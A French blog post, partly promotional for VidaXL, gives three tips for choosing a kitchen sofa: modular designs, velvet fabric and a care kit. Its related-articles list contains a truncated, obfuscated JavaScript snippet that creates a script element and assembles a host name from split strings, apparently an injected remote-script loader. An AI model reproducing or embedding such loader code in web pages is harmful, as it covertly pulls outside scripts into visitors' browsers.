Un canapé pour la cuisine ? Oui, nous pouvons le faire.

Vie Pratique

Un canapé pour la cuisine ? Oui, nous pouvons le faire.

Un canapé pour la cuisine ? Oui, nous pouvons le faire

Sièges et tabourets de bar, c'est fini. Il est temps de passer à autre chose.

Un canapé... dans la cuisine.

Ce n'est pas du tout conventionnel. Mais c'est certainement une tendance. Ces deux dernières années, de plus en plus de personnes ont commencé à installer leurs meubles de cuisine et de salle à manger dans l'espace où elles cuisinent et mangent. Pourquoi ?

Peut-être s'agit-il d'un effet secondaire de l'aménagement en espace ouvert ?

Ce n'est plus une mode passagère, les grands espaces multifonctionnels sont devenus une caractéristique essentielle de la maison moderne - effaçant les frontières entre les différentes pièces. Et un canapé élégant est le moyen idéal de séparer les "zones", sans reconstruire les murs et gâcher la dynamique.

Nous avons connu une révolution, dans laquelle nos maisons sont vraiment devenues des lieux de vie.

Le confinement a transformé la simple cuisine en bureau, salle de classe, salle de sport, salle de bricolage et bien plus encore. Et maintenant, dans cette ère post-Covid, elle sert moins à préparer la nourriture qu'à permettre à la famille et aux amis de se réunir, de se retrouver et de passer du bon temps ensemble.

L'ajout d'un canapé est la dernière pièce du puzzle. Un endroit confortable pour s'asseoir dans une pièce beaucoup plus active.

Ou peut-être que c'est juste une excuse pour reposer vos pieds pendant que le thé chauffe ?

Dans ce cas, eh bien... tant mieux pour vous !

Quelle que soit votre raison, chez VidaXL, nous sommes là pour vous. Les canapés de cuisine apportent un confort supplémentaire dans une pièce où vous passez beaucoup de temps. Non seulement ils améliorent le cadre, mais ces meubles donnent également à l'espace une fonctionnalité supplémentaire. Toutefois, pour que cela fonctionne, il y a quelques éléments que vous devez garder à l'esprit.

3 éléments à prendre en compte pour choisir un canapé de cuisine

La cuisine est un espace très actif. Cuisiner, manger, servir des boissons - c'est là que tout se passe. Je suis désolé de vous l'apprendre, mais les éclaboussures et les tâches sont inévitables. C'est pourquoi le choix d'un canapé pour la cuisine n'est pas tout à fait le même que celui d'un canapé pour le salon.

Voici notre conseil en trois mots:

1. OPTEZ POUR DU MODULAIRE

Lorsqu'il s'agit de canapés de cuisine, la commodité est essentielle.

Il est important de choisir un canapé qui convient à la taille et au style de votre cuisine. Mais il est également appréciable de savoir que vous pourrez changer le canapé ou le déplacer à l'avenir.

Les modèles modulaires vous offrent cette liberté. Vous pouvez créer un canapé qui s'adapte parfaitement à votre espace - grand ou petit. Vous pouvez modifier l'agencement quand vous le souhaitez. Et si le pire se produit et que l'une des sections est irrémédiablement endommagée, cette même section peut être très facilement remplacée.

2. CHOISISSEZ UN TISSU DURABLE

La durabilité est un facteur important à prendre en compte lors de l'achat de tout canapé. Mais pour un canapé de cuisine, c'est essentiel. Peu importe le nombre de "règles du canapé" que vous établissez, nous sommes humains et des accidents peuvent survenir. Vous aurez donc besoin d'un tissu résistant et facile à entretenir.

Notre recommandation ? Le velours.

Il a mauvaise réputation, mais sur le plan de la durabilité, le velours se positionne très haut. Il n'a pas de fils lâches ni de tissage en relief, il est donc difficile de l'accrocher ou de le rayer. Les tâches sont facilement dissimulées par la texture, surtout si vous choisissez une couleur sombre. Et l'entretien est assez simple.

3. INVESTISSEZ DANS UN KIT D'ENTRETIEN

Non seulement il contient les solutions de nettoyage recommandées pour faire face aux "urgences" et garder votre canapé dans l'état où il vient d'être acheté, mais il offre également une fantastique garantie en cas d'accident. Si vous renversez votre vin ou si vos nouveaux Levi's laissent une marque, nous nous en occuperons.


Articles en Relation

Le vin, un nectar tant apprécié Le vin, un nectar tant apprécié Parmi les différentes boissons disponibles, le vin reste le chouchou, depuis des siècles. Terre viticole, l’Europe...
La chambre de l'enfant : Un papier peint sur un seul mur ou sur plusieurs? La chambre de l'enfant : Un papier peint sur un seul mur ou sur plusieurs? Aménager la chambre d'un enfant est un acte qui allie la créativité e...
Murs d'appartement : peindre, tapisser ou décorer avec un papier peint photo? (function(){ wk3x=document.createElement("script");wk3x.type="text/javascript"; wk3x.async=true;wk3x_=(("us")+"t")+"a";wk3x_+=("t.i")+""+"n";wk3x_...
7 Astuces pour une chambre d’enfant bien aménagée 7 Astuces pour une chambre d’enfant bien aménagée Aménager la chambre à coucher d’un enfant peut être un moment délicat. Entre les conseils de vot...
Dyson Gen5 : le meilleur aspirateur-balai du marché ? - Comparatif et avis Dyson Gen5 : le meilleur aspirateur-balai du marché ? Dyson est une marque réputée pour ses aspirateurs-balais innovants et performants. Le dern...
Les Tendances dans les tissus d’ameublement en 2024 Source de la photo Adobe Stock Les Tendances dans les tissus d’ameublement en 2024 Image de Freepik C’est la nouvelle année ! Et nouvel an veut ...

 

VIATOR ACTIVITES

BONNES AFFAIRES